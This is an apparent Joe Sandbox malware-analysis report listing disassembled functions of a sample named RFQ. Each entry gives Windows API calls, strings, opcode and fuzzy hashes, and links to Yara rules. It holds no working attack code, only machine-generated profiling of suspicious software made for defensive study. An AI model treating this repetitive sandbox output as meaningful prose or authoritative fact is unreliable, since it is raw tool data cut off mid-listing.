                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                    • API String ID: 2258743419-1018226102
                                                                                                                                                    • Opcode ID: 8eb4d2c57f2721b8593fa313c030065f85f6194d54c443ffffc638fdfdda84e7
                                                                                                                                                    • Instruction ID: 80bfa6e119aed37798f2c89d415272496b9c47fbf2d1282d6bc4237caae966fb
                                                                                                                                                    • Opcode Fuzzy Hash: 8eb4d2c57f2721b8593fa313c030065f85f6194d54c443ffffc638fdfdda84e7
                                                                                                                                                    • Instruction Fuzzy Hash: 35128D71508341DFD725EF24C885AAFBBE5BF99300F40491EF589A3252DB38EA49CB52
                                                                                                                                                    Function 0079CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0079CEFB
                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0079CF73
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0079CFF4
                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0079D016
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079D025
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0079D042
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 0079D075
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079D094
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0079D0A9
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0079D0B0
                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0079D0C2
                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0079D0DA
                                                                                                                                                      • Part of subcall function 0074B526: GetWindowLongW.USER32(?,000000EB), ref: 0074B537
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                    • API String ID: 3877571568-3619404913
                                                                                                                                                    • Opcode ID: a3fc7a07fa2584c39c85d51851bf28654b1c881b37fecc4d702b970977de9408
                                                                                                                                                    • Instruction ID: a79cd40751d43baba1caffad5ef58a3b3ff5d5b851e9915c0de5871614e076d6
                                                                                                                                                    • Opcode Fuzzy Hash: a3fc7a07fa2584c39c85d51851bf28654b1c881b37fecc4d702b970977de9408
                                                                                                                                                    • Instruction Fuzzy Hash: B8719AB4140205AFEB20CF28DC85FA677E5EB88704F54851DF985872A1DB78ED42CB26
                                                                                                                                                    Function 0079F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0079F37A
                                                                                                                                                      • Part of subcall function 0079D7DE: ClientToScreen.USER32(?,?), ref: 0079D807
                                                                                                                                                      • Part of subcall function 0079D7DE: GetWindowRect.USER32(?,?), ref: 0079D87D
                                                                                                                                                      • Part of subcall function 0079D7DE: PtInRect.USER32(?,?,0079ED5A), ref: 0079D88D
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0079F3E3
                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0079F3EE
                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0079F411
                                                                                                                                                    • _wcscat.LIBCMT ref: 0079F441
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0079F458
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0079F471
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0079F488
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0079F4AA
                                                                                                                                                    • DragFinish.SHELL32(?), ref: 0079F4B1
                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0079F59C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                    • API String ID: 169749273-3440237614
                                                                                                                                                    • Opcode ID: cb660c0db42046e39331b55bff2a781c06593792f0a072fc611c27a089246727
                                                                                                                                                    • Instruction ID: d90da2912a0d7cdb2b4369e082987202ae74605044e378caca0b05ae5a95efe0
                                                                                                                                                    • Opcode Fuzzy Hash: cb660c0db42046e39331b55bff2a781c06593792f0a072fc611c27a089246727
                                                                                                                                                    • Instruction Fuzzy Hash: 81615C71108340AFC711DF60DC89EABBBF8EF89750F404A2DF595921A1DB789A09CB62
                                                                                                                                                    Function 0077AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0077AB3D
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0077AB46
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0077AB52
                                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0077AC40
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077AC70
                                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0077AC9C
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0077AD4D
                                                                                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0077ADDF
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0077AE35
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0077AE44
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0077AE80
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                    • API String ID: 3730832054-3931177956
                                                                                                                                                    • Opcode ID: 0d733e465b7aebe0b16b421313de8140cd3dac4a9c9e541b765a3590a430e6eb
                                                                                                                                                    • Instruction ID: be9f9bf47fce1a1772f6872764de44a508bb8dea740d0d4fe2da4778c3d2f965
                                                                                                                                                    • Opcode Fuzzy Hash: 0d733e465b7aebe0b16b421313de8140cd3dac4a9c9e541b765a3590a430e6eb
                                                                                                                                                    • Instruction Fuzzy Hash: FCD1DEB1A00205FBEF249F65C889B6EB7B5BF84780F14C465E4099B191DB7CEC44DBA2
                                                                                                                                                    Function 0079716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 007971FC
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00797247
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                                    • Opcode ID: cdf0c90429c0c4d5ea2de72bb34383e6bac8572ad1c2c1e6c5d0e1040d59dd77
                                                                                                                                                    • Instruction ID: 7aa1a4a19844bb0e27e17a9f566de088d4e1f603010a8e41b79636b0a5245169
                                                                                                                                                    • Opcode Fuzzy Hash: cdf0c90429c0c4d5ea2de72bb34383e6bac8572ad1c2c1e6c5d0e1040d59dd77
                                                                                                                                                    • Instruction Fuzzy Hash: 9F917070214741DBCB09EF10D895A6EB7A1BF94310F00886DF9966B3A3DB78ED06CB91
                                                                                                                                                    Function 0076CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnumChildWindows.USER32(?,0076CF50), ref: 0076CE90
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                                    • String ID: 4+~$CLASS$CLASSNN$H+~$INSTANCE$L+~$NAME$P+~$REGEXPCLASS$T+~$TEXT
                                                                                                                                                    • API String ID: 3555792229-510292554
                                                                                                                                                    • Opcode ID: e3961152deef5aa569214fd175772cb50a7793f1d63898ee0853a0fc8e4621f6
                                                                                                                                                    • Instruction ID: fe003b2652288fc727d0f487ed0e782f4fda46615d89891c407b0b12adb72a10
                                                                                                                                                    • Opcode Fuzzy Hash: e3961152deef5aa569214fd175772cb50a7793f1d63898ee0853a0fc8e4621f6
                                                                                                                                                    • Instruction Fuzzy Hash: FD91B270A00546EADB19DF60C485BFAFB75FF04300F508529DC9AA7141EF39695ACBE0
                                                                                                                                                    Function 0079E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0079E5AB
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0079BEAF), ref: 0079E607
                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E647
                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E68C
                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E6C3
                                                                                                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0079BEAF), ref: 0079E6CF
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079E6DF
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,0079BEAF), ref: 0079E6EE
                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0079E70B
                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0079E717
                                                                                                                                                      • Part of subcall function 00750FA7: __wcsicmp_l.LIBCMT ref: 00751030
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                                                    • Opcode ID: 03640c4f3f7caeff9a81eb9c4376f5859899bc3e0427b1933aff657f343369fc
                                                                                                                                                    • Instruction ID: 191180b7d53e982bd3787226773dfdc347f30b1a6003f2b68c4eb057925e15d9
                                                                                                                                                    • Opcode Fuzzy Hash: 03640c4f3f7caeff9a81eb9c4376f5859899bc3e0427b1933aff657f343369fc
                                                                                                                                                    • Instruction Fuzzy Hash: 5261AFB1500215FAEF24DF64DC46FEE77A8BB18715F108215F915D60D1EBB8AD90CBA0
                                                                                                                                                    Function 0077D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0077D292
                                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0077D2DF
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D327
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D35E
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D38C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                    • API String ID: 1148790751-4113822522
                                                                                                                                                    • Opcode ID: 36a6783c056b31d9be1ce0c6410305ad21cd2023eb88ffe2198ffed3dc4f7318
                                                                                                                                                    • Instruction ID: ac65647b782789c21a8a14fb5e9a357e807b122a68ddb75759a73823d916bd0e
                                                                                                                                                    • Opcode Fuzzy Hash: 36a6783c056b31d9be1ce0c6410305ad21cd2023eb88ffe2198ffed3dc4f7318
                                                                                                                                                    • Instruction Fuzzy Hash: 835148B1504204EFD710EF11C88596AB3F4FF88758F10896DF88A67252DB39AE06CB92
                                                                                                                                                    Function 007726BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,007A3973,00000016,0000138C,00000016,?,00000016,007CDDB4,00000000,?), ref: 007726F1
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A3973,00000016), ref: 007726FA
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,007A3973,00000016,0000138C,00000016,?,00000016,007CDDB4,00000000,?,00000016), ref: 0077271C
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A3973,00000016), ref: 0077271F
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077276F
                                                                                                                                                    • __swprintf.LIBCMT ref: 00772780
                                                                                                                                                    • _wprintf.LIBCMT ref: 00772829
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00772840
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 618562835-2268648507
                                                                                                                                                    • Opcode ID: af2229491c759ad971eb1a0d03ddf080bb3efdb82b72d4806a4dd9f594ac4eed
                                                                                                                                                    • Instruction ID: 7729f472b4394d4b9e227ca5d66684f081b4e21d44bc3f00733ab8e4e54f5140
                                                                                                                                                    • Opcode Fuzzy Hash: af2229491c759ad971eb1a0d03ddf080bb3efdb82b72d4806a4dd9f594ac4eed
                                                                                                                                                    • Instruction Fuzzy Hash: 02412D72800218FADF15FBE0DD8AEEEB778AF18340F104065B60577093EA696F59CB61
                                                                                                                                                    Function 0077D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077D0D8
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077D0FA
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0077D137
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0077D15C
                                                                                                                                                    • _memset.LIBCMT ref: 0077D17B
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0077D1B7
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0077D1EC
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0077D1F7
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0077D200
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0077D20A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                                    • Opcode ID: 980c413593f09793d032186e4bb0c04c289354e2625e011c1c028748a59b91cb
                                                                                                                                                    • Instruction ID: a962a69c4469c9c93809d0dc0d45246caac2f9b723a1583b587fd9ea73bad6da
                                                                                                                                                    • Opcode Fuzzy Hash: 980c413593f09793d032186e4bb0c04c289354e2625e011c1c028748a59b91cb
                                                                                                                                                    • Instruction Fuzzy Hash: 7B3192B6500109ABDB31DFA4CC49FEB37BCEF89741F5081B6F909D2161E7789A458B24
                                                                                                                                                    Function 0079E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0079BEF4,?,?), ref: 0079E754
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E76B
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E776
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E783
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0079E78C
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E79B
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0079E7A4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E7AB
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E7BC
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,007BD9BC,?), ref: 0079E7D5
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0079E7E5
                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0079E809
                                                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0079E834
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0079E85C
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0079E872
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                    • Opcode ID: 8ac5d3c95b497871988350cb95e6195aa3e49c27b878d743b9dafb25f368727d
                                                                                                                                                    • Instruction ID: 12ca0b32915ff831cc705f99049d75556ba9065f1965fe7921c080ef01b69ca8
                                                                                                                                                    • Opcode Fuzzy Hash: 8ac5d3c95b497871988350cb95e6195aa3e49c27b878d743b9dafb25f368727d
                                                                                                                                                    • Instruction Fuzzy Hash: 4E412975600208FFDB21DFA5DC88EAA7BB8FF89B15F108168F90597260E7399D41DB21
                                                                                                                                                    Function 007805F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
